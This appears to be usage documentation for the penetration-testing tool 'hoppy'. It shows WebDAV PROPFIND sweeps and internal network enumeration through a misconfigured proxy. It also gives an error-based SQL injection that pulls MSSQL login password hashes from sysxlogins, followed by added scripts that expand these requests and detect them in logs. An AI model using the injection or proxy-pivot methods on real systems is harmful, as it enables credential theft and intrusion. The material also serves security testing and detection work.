hoppy

example usage

In the archive there is a directory called example-methods; it contains some other method files which can be used for specific tasks.

testing for webDAV

The default methods file will check for webDAV on the specified directory, but this may not be enough. webDAV can be configured to be enabled only on certain directories, so ideally we need to check for webDAV on every directory on the server. To do this a loop file can be specified with the -L command line switch. This will take all loop methods and run them against every line in the loop file, which should contain the directories on the server. webDAV checking over the loop is contained within the default methods file, but to do only webDAV checking the following line can be used:

  • webDav on (loop), PROPFIND (loop) HTTP/1.1\nhost: (host):(port)\n(auth)\nDepth: 1\nContent-Type: text/xml\nExpect: 100-continue\nContent-Length: 143\nTranslate: f\n\n(wait)\n \n \n\n\n \n\n \n\n

In this instance the loop parameter file contained, for example, the following:

  • /images
  • /tmp
  • /admin
  • /test

command line:

  • hoppy -h testserver -L loop -o example-methods/webdav

as a yxorp scanner

Having found ourselves facing a webserver on a test which appeared to work as a proxy, we wanted a way to use this to enumerate the client's internal network. Enter hoppy. The following methods can be used to connect through a proxy server.

  • site (loop), GET http://(loop)/ HTTP/1.1\nHost: (loop)\n(auth)\n\n
  • Proxy Connect (loop), CONNECT (loop) HTTP/1.1\nHost: (loop)\n(auth)\n\n(wait)GET / HTTP/1.1\nHost: (loop)\n\n

In this instance the loop parameter file contained, for example, the following:

  • 192.168.0.1:80
  • 192.168.0.2:443
  • localhost:22

command line:

  • hoppy -h testserver -L loop -o example-methods/proxy
  • hoppy -h testserver -L loop -o example-methods/proxyconnect
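The method files above all rely on the same placeholder substitution: a method whose name carries (loop) is run once per line of the -L file, (host), (port) and (auth) are filled from the command line, and (wait) marks where hoppy pauses for the server's reply before sending the rest. The script below is an added example, not hoppy's own code: it reproduces that expansion for the two proxy methods so the exact requests a loop run would produce can be inspected offline before a test. The function names, the treatment of an empty (auth), and the assumption that (auth) holds a Basic Authorization header are all mine; the page does not say what (auth) expands to.

```python
"""Expand hoppy-style method lines against a loop file (added example)."""
import base64

# Constructed loop file: the targets from the proxy example on this page.
LOOP_FILE = """192.168.0.1:80
192.168.0.2:443
localhost:22
"""

# The two proxy methods quoted on the page, exactly as a method file holds them:
# line breaks are the two characters backslash-n, not real newlines.
SITE_METHOD = "site (loop), GET http://(loop)/ HTTP/1.1\\nHost: (loop)\\n(auth)\\n\\n"
CONNECT_METHOD = (
    "Proxy Connect (loop), CONNECT (loop) HTTP/1.1\\nHost: (loop)\\n(auth)\\n\\n"
    "(wait)GET / HTTP/1.1\\nHost: (loop)\\n\\n"
)


def basic_auth_header(user, password):
    """Assumed content of (auth): an HTTP Basic Authorization header."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


def parse_method(line):
    """Split 'name (loop), template' into (name, runs_over_loop, template).

    A method whose name contains '(loop)' is run once per loop-file line;
    any other method is run a single time.
    """
    name, _, template = line.partition(", ")
    runs_over_loop = "(loop)" in name
    return name.replace("(loop)", "").strip(), runs_over_loop, template


def expand(template, host, port, loop="", auth=""):
    """Fill the placeholders and return the request as a list of phases.

    Phases are the pieces separated by (wait): each is sent, then the reply
    is read, before the next piece goes out.  An empty (auth) would leave a
    blank line in the middle of the headers (ending them early), so the
    whole '(auth)\\n' line is dropped in that case (assumption).
    """
    auth_line = auth + "\\n" if auth else ""
    text = (template.replace("(auth)\\n", auth_line)
                    .replace("(host)", host)
                    .replace("(port)", str(port))
                    .replace("(loop)", loop))
    # Method-file '\n' becomes a real CRLF line ending on the wire.
    return [phase.replace("\\n", "\r\n") for phase in text.split("(wait)")]


def loop_requests(method_line, loop_file, host, port, auth=""):
    """Map each loop value to the phases of the request built for it."""
    name, runs_over_loop, template = parse_method(method_line)
    if runs_over_loop:
        values = [v.strip() for v in loop_file.splitlines() if v.strip()]
    else:
        values = [""]
    return {v: expand(template, host, port, loop=v, auth=auth) for v in values}


if __name__ == "__main__":
    for method in (SITE_METHOD, CONNECT_METHOD):
        for target, phases in loop_requests(method, LOOP_FILE, "testserver", 80).items():
            print(f"== {parse_method(method)[0]} -> {target} ({len(phases)} phase(s))")
            for i, phase in enumerate(phases, 1):
                print(f"-- phase {i}:\n{phase!r}")
```

Running it shows why the proxyconnect method needs two phases: the CONNECT must be answered (200 if the server tunnels, typically 405 or 400 if it does not) before the inner GET makes sense, whereas the site method is a single absolute-URI request that a real proxy forwards and an ordinary web server usually answers with its own default page or a 400.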

data extraction

hoppy can be used to extract specific data from the server response, for example while extracting data in an error-based SQL injection. While hoppy may not be the best tool to use in this instance, it is possible. To do this a new line needs to be added to the response-keywords file. The second parameter of 1 indicates that we are in data extraction mode.

  • nvarchar, 2

method:

  • SQL (loop), GET /login.asp?username=a&password='+and+1=(select+TOP+1+ master.dbo.fn_varbintohexstr(password)+%2b'B'+from+(select+TOP+(loop)+ password,name+from+MASTER..sysxlogins+ORDER+BY+name+ ASC)+ sqORDER+BY+name+DESC)-- HTTP/1.1\nHost: (host):(port)\n(auth)\n\n
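Each of the three examples on this page leaves a distinctive trace in the target's access log: a PROPFIND against one directory after another from a single client, CONNECT or absolute-URI GET requests sent to a server that is not meant to be a proxy, and a login query string carrying the error-based SQL injection above. The scanner below is an added example written from the server owner's side, not part of hoppy or of this page: it reads combined-format log lines and reports which of those patterns each client produced. The sample log lines are constructed, and the sweep threshold of three distinct PROPFIND paths is an assumption to tune for your own traffic.

```python
"""Flag the probe patterns described on this page in web server logs (added example)."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined/common log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Strings from the injection shown on this page, matched after URL-decoding.
SQLI_MARKERS = ("sysxlogins", "fn_varbintohexstr", "' and 1=(select")

# Constructed sample log: a PROPFIND sweep, two proxy-style requests, one
# error-based injection attempt, and ordinary traffic that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [20/May/2008:10:00:01 +0100] "PROPFIND /images HTTP/1.1" 207 512
10.0.0.5 - - [20/May/2008:10:00:01 +0100] "PROPFIND /tmp HTTP/1.1" 404 0
10.0.0.5 - - [20/May/2008:10:00:02 +0100] "PROPFIND /admin HTTP/1.1" 401 0
10.0.0.5 - - [20/May/2008:10:00:02 +0100] "PROPFIND /test HTTP/1.1" 207 640
10.0.0.9 - - [20/May/2008:10:05:00 +0100] "CONNECT 192.168.0.2:443 HTTP/1.1" 405 0
10.0.0.9 - - [20/May/2008:10:05:01 +0100] "GET http://192.168.0.1:80/ HTTP/1.1" 200 1320
10.0.0.7 - - [20/May/2008:10:07:10 +0100] "GET /login.asp?username=a&password='+and+1=(select+TOP+1+name+from+MASTER..sysxlogins)-- HTTP/1.1" 500 210
10.0.0.2 - - [20/May/2008:10:08:00 +0100] "GET /index.html HTTP/1.1" 200 2048
10.0.0.2 - - [20/May/2008:10:08:01 +0100] "PROPFIND /images HTTP/1.1" 207 512
"""


def parse_line(line):
    """Return the log fields as a dict, or None for a line that is not in the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Indicators a single request matches on its own (no per-client state)."""
    hits = []
    method, target = entry["method"], entry["target"]
    # A CONNECT, or a request line whose target is a full URL, is proxy usage;
    # a plain origin server should never see either from legitimate clients.
    if method == "CONNECT" or re.match(r"https?://", target, re.I):
        hits.append("proxy_probe")
    query = unquote_plus(target.partition("?")[2]).lower()
    if any(marker in query for marker in SQLI_MARKERS):
        hits.append("sqli_error_based")
    return hits


def scan(log_text, sweep_threshold=3):
    """Return {client_ip: set(indicators)}.

    PROPFIND sweeps are judged per client: one PROPFIND is normal WebDAV use,
    the same client probing several distinct paths is the directory loop.
    """
    findings = defaultdict(set)
    propfind_paths = defaultdict(set)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        for hit in classify(entry):
            findings[entry["ip"]].add(hit)
        if entry["method"] == "PROPFIND":
            propfind_paths[entry["ip"]].add(entry["target"])
    for ip, paths in propfind_paths.items():
        if len(paths) >= sweep_threshold:
            findings[ip].add("webdav_sweep")
    return dict(findings)


if __name__ == "__main__":
    for ip, indicators in sorted(scan(SAMPLE_LOG).items()):
        print(f"{ip}: {', '.join(sorted(indicators))}")
```

The 207 Multi-Status answers in the sample are worth reading alongside the sweep flag: they mark the directories where PROPFIND actually succeeded, which is the list a server owner wants to reconcile against the directories where WebDAV was meant to be enabled.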


Last Updated : 20/05/2008 10:38:31